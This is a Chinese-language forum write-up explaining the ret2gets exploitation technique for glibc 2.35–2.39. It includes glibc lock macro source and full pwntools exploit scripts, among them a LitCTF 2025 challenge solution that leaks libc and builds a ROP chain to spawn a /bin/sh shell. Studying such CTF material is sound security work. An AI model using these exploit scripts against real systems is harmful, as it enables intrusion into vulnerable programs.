[原创]ret2gets的原理与利用方法-Pwn-看雪安全社区专业技术交流与安全研究论坛可以看一下这位师傅写的ret2gets的原理。还是十分详细的。由于在高版本的glibc中删除了__libc_csu_init这个函数。所以导致我们在不清楚libc基地址的情况下很难找到pop rdi这样的gadget来为我们传递一参。正常的ret2libc就基本上利用不了了。在glibc2.35~2.37版本中我们可以来看一下这里的ret2gets是怎么利用的。可以先写一个比较简单的demo。版本是glibc2.35的。#include stdio.h int main() { char buf[0x20]; puts(Can you rop?\n); gets(buf); return 0; }很显然这里不存在pop rdi这种方便的一参。那我们应该怎么办呢可以先运行下程序看看做了什么。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) ​ io.interactive()这是我们的测试脚本。可以看到断点打在了发送内容之前。可以看到我们的rdi里存放的是_IO_stdfile_0_lock存放的是libc内的内容。这就为我们泄露libc基地址提供帮助了。首先先看下结构体。typedef struct { int lock; int cnt; void *owner; } _IO_lock_t;我们这里需要利用到里面的两个宏。可以看下源码。glibc2.37#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (--(_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ } while (0)我们可以看到在_IO_lock_unlock里存在对cnt会进行--并判断--后的值是否0。如果等于0那么owner处的值就会被置零。但是owner处是存放着TLS地址的。只要能puts出来我们就拿到了libc基地址了。所以就是说我们输入的第五个字节会被减减。同时要注意puts会有\x00截断所以在owner之前不能存在\x00字节存在。我们可以来看一下如何在没有pop rdi的情况下控制一参。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) pl ba*0x28 p64(elf.plt.gets) gdb.attach(io) io.sendline(pl) io.sendline(b/binp8(u8(b/)1)bsh) ​ io.interactive()可以看到通过减一后我们输入的内容刚好就是/bin/sh了。同时这里还实现了对于一参rdi的控制。但是我们这里没有调用system啊光光控制一参有什么用呢所以我们的首要目的是去获得libc的基地址。也就是要去绕过_IO_lock_unlock的检测。from pwn import * context.log_level debug context.arch amd64 ​ io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets) p64(elf.plt.puts) p64(elf.sym.main) io.sendline(pl1) gdb.attach(io) io.sendline(bA*4b\x00*3) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3b8740 success(hex(base)) rdi base 0x2a3e5 binsh base next(libc.search(/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(baselibc.sym.system) io.sendline(pl2) io.interactive()这里关键在于bA*4b\x00*3。由于gets会把末尾的\n换成\x00所以我们输入后会变成lock被写入为AAAAcnt被写入为\x00*4。当cnt自减时就会变为一个大数\xff\xff\xff\xff。这样就成功绕过了检测得到了libc基地址。pwndbg tele 0x7ffff7e1ca80 00:0000│ rax rdi 0x7ffff7e1ca80 ◂— 0xffffffff41414141 01:0008│ 0x7ffff7e1ca88 —▸ 0x7ffff7fb8740 ◂— 0x7ffff7fb8740 02:0010│ 0x7ffff7e1ca90 ◂— 0 ... ↓ 5 skipped在得到libc基地址后后面去获得各种gadget就简单多了。上面的实现都基于glibc2.35-2.37版本。在glibc2.37~2.39版本中又对lock增加了检测。还是先看源码。#define _IO_lock_lock(_name) \ do { \ void *__self THREAD_SELF; \ if (SINGLE_THREAD_P (_name).owner NULL) \ { \ (_name).lock LLL_LOCK_INITIALIZER_LOCKED; \ (_name).owner __self; \ } \ else if ((_name).owner ! __self) \ { \ lll_lock ((_name).lock, LLL_PRIVATE); \ (_name).owner __self; \ } \ else \ (_name).cnt; \ } while (0) #define _IO_lock_unlock(_name) \ do { \ if (SINGLE_THREAD_P (_name).cnt 0) \ { \ (_name).owner NULL; \ (_name).lock 0; \ } \ else if ((_name).cnt 0) \ { \ (_name).owner NULL; \ lll_unlock ((_name).lock, LLL_PRIVATE); \ } \ else \ --(_name).cnt; \ } while (0)发现这里只有当cnt!0的时候才可以让cnt--。结合nssctf里的一道题来说明。[LitCTF 2025]master_of_rop链接[LitCTF 2025]master_of_rop - NSSCTF__int64 __fastcall main(int a1, char **a2, char **a3) { _BYTE v4[32]; // [rsp0h] [rbp-20h] BYREF ​ puts(Welcome to LitCTF2025!); gets(v4, a2); return 0LL; }依旧一眼栈溢出。下面给出exp。from pwn import * context.log_level debug ​ #io remote(node4.anna.nssctf.cn,28428) io process(./pwn) elf ELF(./pwn) libc ELF(./libc.so.6) pl1 ba*0x28 p64(elf.plt.gets)*2 p64(elf.plt.puts) p64(0x4011ad) io.sendline(pl1) io.sendline(p32(0)ba*4ba*8) io.sendline(ba*4) base u64(io.recvuntil(b\x7f)[-6:]b\x00\x00) - 0x3ba740#远端换成0x28c0 success(hex(base)) rdi base 0x10f75b binsh base next(libc.search(b/bin/sh\x00)) pl2 ba*0x28 p64(rdi) p64(binsh) p64(rdi1) p64(baselibc.sym.system) #gdb.attach(io) io.sendline(pl2) ​ io.interactive()这里解释一下。这里去使用了两次gets两次往_IO_stdfile_0_lock_里写入内容。第一次先去覆盖cnt的值然后把lock置零防止stdin上死锁卡死进程最后发现好像不管写入什么都会把lock置零然后就是第二次写入把lock再给覆盖然后就可以正常打rop了。这里把lock去置零然后后面会发生抢锁的过程然后会更新owner。好像只要owner地址合法就不会考虑lock的值了也要先咕咕咕了。这种题型比较死板基本照着写就行QAQ。问题是这里远端我调了好久也不知道为什么一直和远端有问题。先咕咕咕吧......